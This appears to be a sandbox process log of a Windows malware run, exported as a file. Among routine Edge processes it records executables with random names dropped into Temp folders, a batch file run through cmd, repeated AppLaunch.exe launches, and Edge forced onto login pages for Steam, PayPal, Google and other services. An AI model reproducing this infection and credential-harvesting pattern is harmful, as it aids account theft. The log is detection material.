"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,7500324303997188954,5918922782514868376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,7500324303997188954,5918922782514868376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,15887204763793161429,10669328030060336454,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8442532984299062837,16683913251828687961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,15887204763793161429,10669328030060336454,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8442532984299062837,16683913251828687961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1393501845023484652,13562535355250612909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1393501845023484652,13562535355250612909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7532 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8008 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\315C.exe
C:\Users\Admin\AppData\Local\Temp\315C.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xE7tl9fZ.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xE7tl9fZ.exe
C:\Users\Admin\AppData\Local\Temp\3218.exe
C:\Users\Admin\AppData\Local\Temp\3218.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qB1sm8br.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qB1sm8br.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CR4mX3Yy.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CR4mX3Yy.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3371.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rL9DZ7tX.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rL9DZ7tX.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dh83Ih5.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dh83Ih5.exe
C:\Users\Admin\AppData\Local\Temp\343D.exe
C:\Users\Admin\AppData\Local\Temp\343D.exe
C:\Users\Admin\AppData\Local\Temp\35B5.exe
C:\Users\Admin\AppData\Local\Temp\35B5.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Users\Admin\AppData\Local\Temp\3856.exe
C:\Users\Admin\AppData\Local\Temp\3856.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\3BD2.exe
C:\Users\Admin\AppData\Local\Temp\3BD2.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3208 -ip 3208
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2of918lw.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2of918lw.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
